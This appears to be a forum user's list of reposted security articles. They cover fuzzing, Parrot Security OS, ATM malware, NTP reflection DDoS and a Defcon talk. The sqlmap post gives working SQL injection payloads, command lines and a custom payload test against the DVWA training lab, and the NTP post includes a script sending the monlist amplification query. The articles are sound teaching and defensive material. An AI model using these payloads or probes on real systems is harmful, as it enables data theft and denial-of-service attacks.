Everything posted by Nytro

  1. 15 minute guide to fuzzing
Matt Hillman, August 08, 2013

Have you heard about fuzzing but are not sure what it is or whether you should do it? This guide should quickly get you up to speed on what it's all about.

What is fuzzing?

Fuzzing is a way of discovering bugs in software by providing randomised inputs to programs to find test cases that cause a crash. Fuzzing your programs can give you a quick view of their overall robustness and help you find and fix critical bugs. Fuzzing is ultimately a black-box technique: it requires no access to source code, but it can still be used against software for which you do have source code, because it will potentially find bugs more quickly and avoid the need to review lots of code. Once a crash is detected, having the source code makes the bug much easier to fix.

Pros and cons of fuzzing

Fuzzing can be very useful, but it is no silver bullet. Here are some of the pros and cons of fuzzing:

Pros:
• Can provide results with little effort: once a fuzzer is up and running, it can be left for hours, days or months to look for bugs with no interaction
• Can reveal bugs that were missed in a manual audit
• Provides an overall picture of the robustness of the target software

Cons:
• Will not find all bugs: fuzzing may miss bugs that do not trigger a full program crash, and may be less likely to hit bugs that only occur in highly specific circumstances
• The crashing test cases that are produced may be difficult to analyse, as the act of fuzzing does not give you much knowledge of how the software operates internally
• Programs with complex inputs can require much more work to produce a smart enough fuzzer to get sufficient code coverage

Smart and dumb fuzzing

Fuzzers provide random input to software. This may be in the form of a network protocol, a file of a certain format or direct user input. The fuzzed input can be completely random, with no knowledge of what the expected input should look like, or it can be created to look like valid input with some alterations.

A fuzzer that generates completely random input is known as a "dumb" fuzzer, as it has no built-in intelligence about the program it is fuzzing. A dumb fuzzer requires the smallest amount of work to produce (it could be as simplistic as piping /dev/random into a program). This small amount of work can produce results for very little cost – one of fuzzing's big advantages.

However, sometimes a program will only perform certain processing if particular aspects of the input are present. For example, a program may accept a "name" field in its input, and this field may have a "name length" associated with it. If these fields are not present in a form that is valid enough for the program to identify, it may never attempt to read the name. However, if these fields are present in a valid form but the length value is set incorrectly, the program may read beyond the buffer containing the name and trigger a crash. Without input that is at least partly valid, this is very unlikely to happen.

In these cases, "smart" fuzzers can be used. These are programmed with knowledge of the input format (i.e. a protocol definition or rules for a file format). The fuzzer can then construct mostly valid input and only fuzz parts of the input within that basic format. The greater the level of intelligence you build into a fuzzer, the deeper you may be able to go into a protocol or file format's processing, but the more work you create for yourself. A balance needs to be found between these two extremes.
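To make the dumb end of that spectrum concrete, here is a minimal sketch in Python. The target path and its stdin-based input are assumptions for illustration, not part of the original article:

[code]
import os
import subprocess

# Hypothetical target that parses whatever arrives on stdin.
TARGET = "./target_program"

for i in range(10000):
    case = os.urandom(1024)  # completely random: no format knowledge at all
    try:
        proc = subprocess.run([TARGET], input=case,
                              capture_output=True, timeout=5)
    except subprocess.TimeoutExpired:
        continue  # treat hangs separately if they interest you
    if proc.returncode < 0:  # on POSIX, negative means killed by a signal
        with open(f"crash_{i}.bin", "wb") as f:
            f.write(case)    # record the input so the crash can be reproduced
        print(f"crash on iteration {i} (signal {-proc.returncode})")
[/code]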
It can be good to begin with a dumber fuzzer and increase its intelligence as the code quality of the software you are testing increases. If you get lots of crashes with a simplistic fuzzer, there is no point spending a long time making it more intelligent until the code quality improves to a point where the extra intelligence is required.

Types of fuzzer

Broadly speaking, fuzzers can be split into two categories based on how they create input to programs – mutation-based and generation-based. This section details those categories as well as offering a brief description of a more advanced technique called evolutionary fuzzing.

Mutation

Mutation-based fuzzers are arguably one of the easier types of fuzzer to create. This technique suits dumb fuzzing but can be used with more intelligent fuzzers as well. With mutation, samples of valid input are mutated randomly to produce malformed input.

A dumb mutation fuzzer can simply select a valid sample input and alter parts of it randomly. For many programs, this can provide a surprising amount of mileage, as the inputs are often still similar enough to valid input that good code coverage can be achieved without the need for further intelligence. You can build in greater intelligence by allowing the fuzzer to do some level of parsing of the samples, to ensure that it only modifies specific parts or that it does not break the overall structure of the input such that it is immediately rejected by the program. Some protocols or file formats incorporate checksums that will fail if the data is modified arbitrarily. A mutation-based fuzzer should usually fix these checksums so that the input is accepted for processing; otherwise the only code tested is the checksum validation and nothing else.

Two useful techniques that can be used by mutation-based fuzzers are described below.

Replay

A fuzzer can take saved sample inputs and simply replay them after mutating them. This works well for file format fuzzing, where a number of sample files can be saved, fuzzed and provided to the target program. Simple or stateless network protocols can also be fuzzed effectively with replay, as the fuzzer will not need to make lots of legitimate requests to get deep into the protocol. For a more complex protocol, replay may be more difficult, as the fuzzer may need to respond in a dynamic way to the program to allow processing to continue deep into the protocol, or the protocol may simply be inherently non-replayable.

Man-in-the-Middle or Proxy

You may have heard of Man-in-the-Middle (MITM) as a technique used by penetration testers and hackers, but it can also be used for mutation-based network protocol fuzzing. MITM describes the situation where you place yourself in the middle of a client and server (or two clients in the case of peer-to-peer networking), intercepting and possibly modifying messages passed between them. In this way, you are acting like a proxy between the two. The term MITM is generally used when it is not expected that you will be acting like a proxy, but for our purposes the terms are largely interchangeable.

By setting your fuzzer up as a proxy, it can mutate requests or responses depending on whether you are fuzzing the server or the client. Again, the fuzzer could have no intelligence about the protocol and simply randomly alter some requests and not others, or it could intelligently target requests at the specific level of the protocol in which you are interested. Proxy-based fuzzing can allow you to take an existing deployment of a networked program and quickly insert a fuzzing layer into it, without needing to make your fuzzer act like a client or server itself.
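Before moving on to generation-based fuzzers, here is a minimal sketch of byte-level mutation. The sample filename and the 1% replacement rate are arbitrary choices for illustration:

[code]
import random

def mutate(sample: bytes, rate: float = 0.01) -> bytes:
    # Randomly overwrite a small fraction of bytes in a valid sample.
    # The result stays similar enough to valid input to reach deep code.
    data = bytearray(sample)
    for _ in range(max(1, int(len(data) * rate))):
        data[random.randrange(len(data))] = random.randrange(256)
    # A smarter mutator would re-fix any checksums here, so the input
    # is not rejected before the interesting parsing code runs.
    return bytes(data)

with open("sample.pdf", "rb") as f:   # any saved valid sample file
    fuzzed = mutate(f.read())
[/code]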
Generation

Generation-based fuzzers generate input from scratch rather than mutating existing input. They usually require some level of intelligence in order to construct input that makes at least some sense to the program, although generating completely random data would also technically be generation.

Generation fuzzers often split a protocol or file format into chunks, which they can build up in a valid order, randomly fuzzing some of those chunks independently. This can create inputs that preserve their overall structure but contain inconsistent data within it. The granularity of these chunks and the intelligence with which they are constructed define the level of intelligence of the fuzzer.

While mutation-based fuzzing can have a similar effect to generation fuzzing (as, over time, mutations will be randomly applied without completely breaking the input's structure), generating inputs ensures that this will be so. Generation fuzzing can also get deeper into a protocol more easily, as it can construct valid sequences of inputs, applying fuzzing only to specific parts of that communication. It also allows the fuzzer to act as a true client/server, generating correct, dynamic responses where these cannot be blindly replayed.

Evolutionary

Evolutionary fuzzing is an advanced technique, which we will only briefly describe here. It allows the fuzzer to use feedback from each test case to learn the format of the input over time. For example, by measuring the code coverage of each test case, the fuzzer can heuristically work out which properties of the test case exercise a given area of code, and it can gradually evolve a set of test cases that cover the majority of the program code. Evolutionary fuzzing often relies on techniques similar to genetic algorithms and may require some form of binary instrumentation to operate correctly.

What are you really fuzzing?

Even for relatively dumb fuzzers, it is important to keep in mind what part of the code your test cases are actually likely to hit. To give a simple example, if you are fuzzing an application protocol that uses TCP/IP and your fuzzer randomly mutates a raw packet capture, you are likely to be corrupting the TCP/IP packets themselves, and your input is unlikely to get processed by the application at all. Or, if you were testing an OCR program that parses images of text into real text, but you were mutating the whole of an image file, you could end up testing its image parsing code more often than the actual OCR code. If you wanted to target the OCR processing specifically, you might wish to keep the headers of the image file valid. Likewise, you may be generating input that is so random it does not pass an initial sanity check in the program, or the code contains a checksum that you do not correct. You are then only testing that first branch in the program, never getting deeper into the program code.
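Tying the last two ideas together, here is a generation-based sketch for a made-up toy format (4-byte magic, little-endian length, then a name field): the structure stays valid enough to pass the program's initial checks, while the length field is deliberately fuzzed with edge values.

[code]
import random
import struct

def generate_case() -> bytes:
    # Build structurally valid input from scratch: magic, name length, name.
    name = bytes(random.randrange(0x20, 0x7f)
                 for _ in range(random.randrange(1, 64)))
    # Usually tell the truth about the length, but sometimes lie --
    # inconsistent data inside an otherwise valid structure.
    if random.random() < 0.5:
        length = len(name)
    else:
        length = random.choice([0, 1, len(name) - 1, len(name) + 1, 0xFFFF])
    return b"MAGC" + struct.pack("<H", length) + name
[/code]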
Anatomy of a fuzzer

To operate effectively, a fuzzer needs to perform a number of important tasks:
• Generate test cases
• Record test cases or any information needed to reproduce them
• Interface with the target program to provide test cases as input
• Detect crashes

Fuzzers often split many of these tasks out into separate modules, for example having one library that can mutate data or generate it based on a definition, and another to provide test cases to the target program, and so on. Below are some notes on each of these tasks.

Test case generation

Generating test cases will vary depending on whether mutation-based or generation-based fuzzing is being employed. With either, there will be something that needs randomly transforming, whether it is a field of a particular type or an arbitrary chunk of data. These transformations can be completely random, but it is worth remembering that edge and corner cases are often the source of bugs in programs. As such, you may wish to favour such cases and include values such as:
• Very long or completely blank strings
• Maximum and minimum values for integers on the platform
• Values like -1, 0, 1 and 2

Depending on what you are fuzzing, there may be specific values or characters that are more likely to trigger bugs. For example:
• Null characters
• New line characters
• Semi-colons
• Format string values (%n, %s, etc.)
• Application-specific keywords

Reproducibility

The simplest way to reproduce a test case is to record the exact input used when a crash is detected. However, there are other ways to ensure reproducibility that can be more convenient in certain circumstances. One is to store the initial seed used for the random component of test case generation, and to ensure that all subsequent random behaviour follows a path that can be traced back to that seed. By re-running the fuzzer with the same seed, the behaviour should be reproducible. For example, you may record only the test case number and the initial seed, and then quickly re-execute generation with that seed until you reach the given test case (a sketch of this idea appears at the end of this section).

This technique can be useful when the target program accumulates dependencies based on past inputs. Previous inputs may have caused the program to initialise various items in its memory that need to be present to trigger the bug. In these situations, simply recording the crashing test case would not be sufficient to reproduce it.

Interfacing with the target

Interfacing with the target program to provide the fuzzed input is often straightforward. For network protocols, it may simply involve sending the test case over the network or responding to a client request; for file formats, it may simply mean executing the program with a command line argument pointing to the test case. However, sometimes the input is provided in a form that is not trivial to generate in an automated way, or scripting the program to execute each test case has a high overhead and proves very slow.

Creative thinking in these cases can reveal ways to exercise the relevant piece of code with the right data. For example, a program may be instrumented in memory to execute a parsing function with the input provided as an argument entirely in memory. This can remove the need for the program to go through a lengthy loading procedure before each test case, and further speed increases can be obtained by generating and providing test cases completely in memory rather than going via the hard drive.
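Returning to the reproducibility idea above, here is a minimal illustration of seed-based replay, where only the seed and the case number need to be recorded:

[code]
import random

def nth_case(seed: int, n: int, size: int = 64) -> bytes:
    # All randomness flows from one seeded generator, so recording just
    # (seed, n) is enough to regenerate the nth test case exactly.
    rng = random.Random(seed)
    case = b""
    for _ in range(n + 1):
        case = bytes(rng.randrange(256) for _ in range(size))
    return case

assert nth_case(1234, 42) == nth_case(1234, 42)  # deterministic replay
[/code]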
Crash detection

Crash detection is critical for fuzzing. If you cannot accurately determine when a program has crashed, you will not be able to identify a test case as triggering a bug. There are a number of common ways to approach this:

Attach a debugger. This will provide you with the most accurate results, and you can script the debugger to provide a crash trace as soon as a crash is detected. However, having a debugger attached can slow programs significantly, and this can cause quite an overhead. The fewer test cases you can generate in a given period of time, the fewer chances you have of finding a crash.

See if the process disappears. Rather than attaching a debugger, you can simply see if the process ID of the target still exists on the system after executing the test case. If the process has disappeared, it probably crashed. You can re-run the test case in a debugger later if you want more information about the crash, and you can even do this automatically for each crash, while still avoiding the slowdown of having the debugger attached for every case.

Timeout. If the program normally responds to your test cases, you can set a timeout after which you assume the program has either crashed or frozen. This can also detect bugs that cause the program to become unresponsive but not necessarily to terminate.

Whichever method you use, the program should be restarted whenever it crashes or becomes unresponsive, in order to allow fuzzing to continue.
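A minimal sketch combining the last two approaches (process-exit checking and a timeout), assuming a target that takes the test case path as an argument:

[code]
import subprocess

def run_case(target: str, case_path: str, timeout_s: float = 5.0) -> str:
    # No debugger attached: just launch the target on the test case and
    # classify the outcome, keeping per-case overhead low.
    try:
        proc = subprocess.run([target, case_path],
                              capture_output=True, timeout=timeout_s)
    except subprocess.TimeoutExpired:
        return "hang"      # unresponsive: possibly a bug that never crashes
    if proc.returncode < 0:
        return "crash"     # killed by a signal on POSIX, e.g. SIGSEGV
    return "ok"            # the harness then restarts/continues as needed
[/code]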
Fuzzing quality

There are a number of things you can do to measure or improve the quality of your fuzzing. While these are all good things to keep in mind, you may not need to bother with them all if you are already getting lots of unique crashes within a useful timeframe.

Speed

Possibly one of the most important factors in fuzzing is speed. How many test cases per second or minute can you run? Sensible values will of course depend on the target, but the more test cases you can execute, the more likely you are to find a crash in a given time period. Fuzzing is random, so every test case is like a lottery ticket, and you want as many of them as you can get. There are lots of things you can do to increase the speed of your test cases, such as improving the efficiency of your generation or mutation routines, parallelising test cases, decreasing timeouts or running programs in "headless" modes where they do not display a GUI. And of course, if you want to, you can simply buy faster kit!

Categorising crashes

Finding crashes is of course only the start of the process. Once you find a crashing test case, you will need to analyse it, work out what the bug is, and either fix it or write an exploit for it, depending on your motivation. If you have thousands of crashing test cases, this can be quite daunting. By categorising crashes you can prioritise them according to which ones are most interesting to you. This can also help you identify when one test case is triggering the same bug as another, so that you only keep the cases relating to unique crashes. In order to do this, you will need some automated information about the crash so you can make a decision. Running the test case with the target attached to a debugger can provide a crash trace which you can parse for values such as the exception type, register values, stack contents and so on. One tool from Microsoft that can help with this is !exploitable (pronounced "bang exploitable"), which works with the WinDbg debugger to categorise crashes according to how exploitable it thinks the bug is.

Test case reduction

As fuzzing randomly alters input, it is common for a crashing test case to have multiple alterations that are not relevant to triggering the bug. Test case reduction is the act of narrowing down a test case to the minimum set of alterations from a valid input required to trigger the bug, so that you only need to focus on that part of the input in your analysis. This reduction can be performed manually, but it can also be performed automatically by the fuzzer. When a crashing test case is encountered, the fuzzer can re-execute the test case several times, gradually reducing the alterations made to the input until the smallest set of changes remains, whilst still triggering the bug. This can simplify your analysis and may also help to categorise crashing test cases, as you will know precisely what parts of the input are affected.

Code coverage

Code coverage is a measure of how much of the program's code has been executed by the fuzzer. The idea is that the more coverage you get, the more of the program you have actually tested. Measuring code coverage can be tricky and often requires binary instrumentation to track which portions of code are being executed. You can also measure code coverage in different ways, such as by line, by basic block, by branch or by code path. Code coverage is not a perfect measure with regard to fuzzing, as it is possible to execute code without revealing bugs in it, and there are often areas of code that almost never get executed, such as safety error checks that are unlikely to really be needed and are very unlikely to be interesting to us anyway. Nevertheless, some form of code coverage measurement can provide insight into what your fuzzer is triggering within the program, especially when your fuzzing is completely black box and you may not yet know much about the program's inner workings. Some tools and technologies that may help with code coverage include Pai Mei, Valgrind, DynamoRIO and DTrace.

Fuzzing frameworks

There are a number of existing frameworks that allow you to create fuzzers without having to work from scratch. Some of these frameworks are complex, and it may still take a while to create a working fuzzer for your target; by contrast, others take a very simple approach. A selection of these frameworks and fuzzers is listed here for your reference:

Radamsa – designed to be easy to use and flexible. It attempts to "just work" for a variety of input types and contains a number of different fuzzing algorithms for mutation.

Sulley – provides a comprehensive generation framework, allowing structured data to be represented for generation-based fuzzing. It also contains components to help with recording test cases and detecting crashes.

Peach – can perform smart fuzzing for file formats and network protocols. It can perform both generation- and mutation-based fuzzing, and it contains components to help with modelling and monitoring the target.

SPIKE – a network protocol fuzzer. It requires good knowledge of C to use and is designed to run on Linux.

Grinder – a web browser fuzzer, which also has features to help in managing large numbers of crashes.
NodeFuzz – a Node.js-based harness for web browsers, which includes instrumentation modules to gain further information from the client side.

Source: https://www.mwrinfosecurity.com/knowledge-centre/15-minute-guide-to-fuzzing/
  2. Web Shell: PHP Meterpreter. Source: Web Shell: PHP Meterpreter
  3. Meet Parrot Security OS (a Linux Distro) – Pentesting in the cloud!
By Henry Dalziel, Information Security Blogger

Many of our regular readers and Hacker Hotshot community know by now that we enjoy covering news on Linux pentesting distros, and whilst the heavy hitters such as Kali Linux and BackBox tend to get most of the limelight, we particularly like exposing upcoming distros, and here is one certainly worth blogging about: Parrot Security OS.

Linux penetration testing distros (call them hacking distros if you want) basically revolve around the same premise, i.e. bundling 'best of breed' pentesting tools within an easy-to-use operating system and keeping them efficiently updated. Now, the interesting thing about Parrot Security OS is that the team behind it have a novel way of using the cloud to manage the OS. We have to be honest in that we are not entirely sure how the cloud pentesting distro concept works – and for that reason we'd be grateful if any readers could chime in and drop a comment below to help improve this post.

Here's what we do know about this distro, which does feel like it is packing a punch. First off, it is based on Debian GNU/Linux mixed with Frozenbox OS and Kali Linux to, in their own words, 'provide the best penetration and security testing experience.' Certainly, taking the Debian/Kali Linux route is a smart move, since it is a tried and tested platform that offers reliability. Another thing we do know is that the design of the distro, as you would expect from a bunch of Italian pentesters, looks very slick and easy on the eye – and let's be honest, that is important, because if you are anything like us you are spending too much time in front of your monitors. Of interest, and on the subject of Italy, we note that there are several IT security distros that hail from Italy, namely BackBox and CAINE (which is actually more of a forensics distro). Learn more and get a copy of Parrot 0.6 here.

Pentesting in the cloud

This does intrigue us: how can the cloud be applied to a penetration tester's operating system? Does the OS fit into a particular cloud service model? As per the National Institute of Standards and Technology (NIST SP 800-145) definition, there are three cloud service models:

• Infrastructure as a Service (IaaS): the provider supplies hardware and network connectivity, while the tenant is responsible for the virtual machine and the software stack that operates within it.
• Platform as a Service (PaaS): the tenant supplies the web or database application (for example) that they would like to deploy, and the provider supplies all the necessary components required to run the app.
• Software as a Service (SaaS): the provider supplies the app and all the components necessary for its operation. SaaS is meant to be a 'quick-fix' for the tenant.

In Summary

We might be way off the mark here – and if we are, please let us know by dropping a comment below. We will be keeping an eye on Parrot Security OS, so please consider this your first introduction to what looks like a promising project, and don't forget where you heard it first! On the subject of penetration distros, we had an interesting Hacker Hotshot presentation from Andrew Hoog in which he discussed 'How To Turn BYOD Risk Into Mobile Security Strength'.
The reason we bring that up is that Andrew is the co-founder of viaForensics and co-developer of Santoku, a distro that focuses on mobile forensics – another niche and interesting area of IT security. We wish the Parrot (Frozenbox) team all the best and look forward to hearing how the project develops.

Source: Meet Parrot Security OS (a Linux Distro) - Pentesting in the cloud!
  4. Sqlmap Tricks for Advanced SQL Injection

Sqlmap is an awesome tool that automates SQL injection discovery and exploitation. I normally use it for exploitation only, because I prefer manual detection in order to avoid stressing the web server or being blocked by IPS/WAF devices. Below I provide a basic overview of sqlmap and some configuration tweaks for finding trickier injection points.

Basics

Using sqlmap for classic SQLi is very straightforward:

./sqlmap.py -u 'http://mywebsite.com/page.php?vulnparam=hello'

The target URL after the -u option includes a parameter vulnerable to SQLi (vulnparam). Sqlmap will run a series of tests and detect it very quickly. You can also explicitly tell sqlmap to only test specific parameters with the -p option. This is useful when the query contains various parameters and you don't want sqlmap to test everything. You can use the --data option to pass any POST parameters. To maximize successful detection and exploitation, I usually use the --headers option to pass a valid User-Agent header (from my browser, for example). Finally, the --cookie option is used to specify any useful cookie along with the queries (e.g. a session cookie).

Advanced Attack

Sometimes sqlmap cannot find tricky injection points, and some configuration tweaks are needed. In this example, I will use the Damn Vulnerable Web App (DVWA), a deliberately insecure web application used for educational purposes. It uses PHP and a MySQL database. I also customized the source code to simulate a complex injection point. Here is the source of the PHP file responsible for the Blind SQL Injection exercise, located at /[install_dir]/dvwa/vulnerabilities/sqli_blind/source/low.php:

[phpcode]
<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];
    if (!preg_match('/-BR$/', $id))
        $html .= '<pre><h2>Wrong ID format</h2></pre>';
    else {
        $id = str_replace("-BR", "", $id);
        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result = mysql_query($getid); // Removed 'or die' to suppress mysql errors
        $num = @mysql_numrows($result); // The '@' character suppresses errors, making the injection 'blind'
        if ($num > 0)
            $html .= '<pre><h2>User exists!</h2></pre>';
        else
            $html .= '<pre><h2>Unknown user!</h2></pre>';
    }
}
?>
[/phpcode]

Basically, this code receives an ID composed of a numerical value followed by the string "-BR". The application first validates that this suffix is present and then extracts the numerical value. It then concatenates this value into the SQL query used to check whether it is a valid user ID and returns the result ("User exists!" or "Unknown user!").

This page is clearly vulnerable to SQL injection, but due to the string manipulation routine before the actual SQL command, sqlmap is unable to find it:

./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1-BR&Submit=Submit#' --level=5 --risk=3 -p id

I'm using a valid User-Agent and an authenticated session cookie, and I'm forcing sqlmap to test the "id" parameter with the -p option. Even when I set the level and risk of tests to their maximum, sqlmap is not able to find it. To pass the validation and successfully exploit this SQLi, we must inject our payload between the numerical value and the "-BR" suffix.
This is a typical blind SQL injection instance and I'm lazy, so I don't want to exploit it manually. For more information about this kind of SQLi, please check this link: https://www.owasp.org/index.php/Blind_SQL_Injection.

http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=1+%23-BR&Submit=Submit#
http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=0+%23-BR&Submit=Submit#

Note that we are URL-encoding special characters because the parameter is located in the URL. The decoded string is: id=1' AND 1=1 #-BR

Sqlmap Tweaking

How do we force sqlmap to inject there? Well, the first idea is to use the --suffix option with the value "-BR" and set "id=1" in the query. It will force sqlmap to add this value after every query. Let's try it with debug information (the -v3 option):

./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 --risk=3 -p id --suffix="-BR" -v3

Still no luck. To check what's going on, we can increase the debug level or set the --proxy="http://localhost:8080" option to point to your favorite web proxy. It appears sqlmap does not add comments when a suffix is passed on the command line, so every query looks like this: id=1' AND 1=0 -BR. Obviously, that is not working.

Below is how to handle this situation. The file located at "sqlmap/xml/payloads.xml" contains all the tests sqlmap will perform. It is an XML file, and you can add your own tests to it. As this is a boolean-based blind SQLi instance, I am using the test called "AND boolean-based blind - WHERE or HAVING clause (MySQL comment)" as a template and modifying it. Here is the new test I added to my payloads.xml file:

<test>
    <title>AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title>
    <stype>1</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>AND [INFERENCE] #</vector>
    <request>
        <payload>AND [RANDNUM]=[RANDNUM] #</payload>
    </request>
    <response>
        <comparison>AND [RANDNUM]=[RANDNUM1] #</comparison>
    </response>
    <details>
        <dbms>MySQL</dbms>
    </details>
</test>

This test simply forces the use of the # character (a MySQL comment) in every payload. The original test used the <comment> tag as a sub-tag of <request>; as we saw, that does not work with suffixes. Now we explicitly include this character at the end of every request, before the "-BR" suffix. A detailed description of the available options is included in the payloads.xml file, but here is a summary of the settings I used:

• <title>: the title… duh.
• <stype>: type of test; 1 means boolean-based blind SQL injection.
• <level>: level of this test, set to 1 (can be set to anything you want, as long as you set the matching --level option on the command line).
• <risk>: risk of this test (like <level>, can be set to anything you want as long as you set the matching --risk option on the command line).
• <clause>: in which clause this will work; 1 means WHERE or HAVING clauses.
• <where>: where to insert the payload; 1 means appending the payload to the parameter's original value.
• <vector>: the payload used for exploitation, also used to check whether the injection point is a false positive.
• <request>: the payload that will be injected and should trigger a True condition (e.g. ' AND 1=1 #). The sub-tag <payload> has to be used here.
• <response>: the payload that will be injected and should trigger a False condition (e.g. ' AND 1=0 #). The sub-tag <comparison> has to be used here.
• <details>: sets the database in use: MySQL. The sub-tag <dbms> has to be used here.

Let's see if this works. Great! Now we can easily exploit this with sqlmap. Sqlmap is a very powerful and highly customizable tool; I really recommend it if you're not already using it. It can save you a lot of time during a penetration test.

Posted by Christophe De La Fuente on 30 December 2013

Source: Sqlmap Tricks for Advanced SQL Injection - SpiderLabs Anterior
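For completeness, a hedged sketch of the manual true/false oracle that the crafted URLs above rely on, using Python's requests library. The session cookie value is a placeholder, and requests URL-encodes the payload for us:

[code]
import requests

BASE = "http://localhost/dvwa/vulnerabilities/sqli_blind/"
COOKIES = {"security": "low", "PHPSESSID": "<your session id>"}

def condition_is_true(payload: str) -> bool:
    # The page prints "User exists!" for a true condition and
    # "Unknown user!" otherwise -- a classic boolean-blind oracle.
    r = requests.get(BASE, params={"id": payload, "Submit": "Submit"},
                     cookies=COOKIES)
    return "User exists!" in r.text

print(condition_is_true("1' AND 1=1 #-BR"))  # expected: True
print(condition_is_true("1' AND 1=0 #-BR"))  # expected: False
[/code]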
  5. Cash machines raided with infected USB sticks
By Chris Vallance, BBC Radio 4

Researchers have revealed how cyber-thieves sliced into cash machines in order to infect them with malware earlier this year. The criminals cut holes in the machines in order to plug in USB drives that installed their code onto the ATMs. Details of the attacks on an unnamed European bank's cash dispensers were presented at the hacker-themed Chaos Communication Congress in Hamburg, Germany. The crimes also appear to indicate that the thieves mistrusted each other. The two researchers who detailed the attacks have asked for their names not to be published.

Access code

The thefts came to light in July, after the lender involved noticed several of its ATMs were being emptied despite the safes used to protect the cash inside. After surveillance was increased, the bank discovered the criminals were vandalising the machines to use the infected USB sticks. Once the malware had been transferred, they patched the holes up. This allowed the same machines to be targeted several times without the hack being discovered.

To activate the code at the time of their choosing, the thieves typed in a 12-digit code that launched a special interface. Analysis of software installed onto four of the affected machines showed that it displayed the amount of money available in each denomination of note and presented a series of menu options on the ATM's screen to release each kind. The researchers said this allowed the attackers to focus on the highest-value banknotes in order to minimise the amount of time they were exposed.

But the crimes' masterminds appeared to be concerned that some of their gang might take the drives and go solo. To counter this risk, the software required the thief to enter a second code in response to numbers shown on the ATM's screen before they could release the money. The correct response varied each time, and the thief could only obtain the right code by phoning another gang member and telling them the numbers displayed. If they did nothing, the machine would return to its normal state after three minutes.

The researchers added that the organisers displayed "profound knowledge of the target ATMs" and had gone to great lengths to make their malware code hard to analyse. However, that care did not extend to the software's filenames – the key one was called hack.bat.

Source: BBC News - Cash machines raided with infected USB sticks
  6. Defcon 21 - Evolving Exploits Through Genetic Algorithms

Description: This talk will discuss the next logical step from dumb fuzzing: breeding exploits via machine learning and evolution. Using genetic algorithms, this talk will take simple SQL exploits and breed them into precision tactical weapons. Stop looking at SQL error messages and carefully crafting injections – let genetic algorithms take over and create lethal exploits to pwn sites for you!

soen (@soen_vanned) is a reverse engineer and exploit developer for the hacking team V&. As a member of the team, he has participated in and won Open Capture the Flag at DEF CON 16, 18 and 19. Soen also participated in the DDTEK competition at DEF CON 20. 0xSOEN@blogspot.com

For more information, please visit: https://www.defcon.org/html/defcon-21/dc-21-speakers.html

Source: Defcon 21 - Evolving Exploits Through Genetic Algorithms
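The talk itself is the authoritative source; purely as a toy illustration of the evolutionary loop it describes, here is a sketch where the fitness function is a stand-in for scoring payloads by the target's responses:

[code]
import random

CHARSET = "'\"#()=10 ANDOR-"

def fitness(payload: str) -> float:
    # Stand-in: a real implementation would score each payload by the
    # target's response (error text, content or timing differences).
    return random.random()

def mutate(payload: str) -> str:
    i = random.randrange(len(payload))
    return payload[:i] + random.choice(CHARSET) + payload[i + 1:]

population = ["' OR 1=1 -- " for _ in range(20)]
for generation in range(100):
    ranked = sorted(population, key=fitness, reverse=True)
    parents = ranked[:5]  # selection: only the fittest payloads breed
    population = [mutate(random.choice(parents)) for _ in range(20)]
print(ranked[0])
[/code]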
  7. Attackers Wage Network Time Protocol-Based DDoS Attacks
Kelly Jackson Higgins

Attackers have begun exploiting an oft-forgotten network protocol in a new spin on distributed denial-of-service (DDoS) attacks, as researchers spotted a spike in so-called NTP reflection attacks this month. The Network Time Protocol, or NTP, syncs time between machines on the network and runs over UDP port 123. It's typically configured once by network administrators and often is not updated, according to Symantec, which discovered a major jump in attacks via the protocol over the past few weeks.

"NTP is one of those set-it-and-forget-it protocols that is configured once and most network administrators don't worry about it after that. Unfortunately, that means it is also not a service that is upgraded often, leaving it vulnerable to these reflection attacks," says Allan Liska, a Symantec researcher, in a blog post last week.

Attackers appear to be employing NTP for DDoSing similar to the way DNS is abused in such attacks: they transmit small spoofed packets requesting a large amount of data to be sent to the DDoS target's IP address. According to Symantec, it's all about abusing the so-called "monlist" command in an older version of NTP. Monlist returns a list of the last 600 hosts that have connected to the server. "For attackers the monlist query is a great reconnaissance tool. For a localized NTP server it can help to build a network profile. However, as a DDoS tool, it is even better because a small query can redirect megabytes worth of traffic," Liska explains in the post. Monlist modules can be found in NMAP as well as in Metasploit, for example; Metasploit includes a monlist DDoS exploit module.

The spike in NTP reflection attacks occurred mainly in mid-December, with close to 15,000 IPs affected, and dropped off significantly after December 23, according to Symantec's data. Symantec recommends that organizations update their NTP implementations to version 4.2.7, which does not use the monlist command. Another option is to disable access to monlist in older versions of NTP. "By disabling monlist, or upgrading so the command is no longer there, not only are you protecting your network from unwanted reconnaissance, but you are also protecting your network from inadvertently being used in a DDoS attack," Liska says.

Source: Attackers Wage Network Time Protocol-Based DDoS Attacks -- Dark
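To gauge the exposure of a server you administer, here is a hedged sketch that sends the widely documented mode-7 monlist query and compares request and response sizes to show the amplification factor. The hostname is a placeholder; probe only systems you own:

[code]
import socket

# NTP mode 7 (private), implementation 3 (XNTPD), request code 42
# (MON_GETLIST_1): the "monlist" query abused for amplification.
MONLIST_QUERY = b"\x17\x00\x03\x2a" + b"\x00" * 4

def probe_monlist(host: str, timeout_s: float = 3.0) -> int:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout_s)
    sock.sendto(MONLIST_QUERY, (host, 123))
    total = 0
    try:
        while True:  # a vulnerable server replies with many large packets
            data, _ = sock.recvfrom(4096)
            total += len(data)
    except socket.timeout:
        return total

received = probe_monlist("ntp.example.com")  # placeholder: your own server
print(f"sent {len(MONLIST_QUERY)} bytes, received {received} bytes")
[/code]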
  8. Detection of Widespread Weak Keys in Network Devices

Abstract

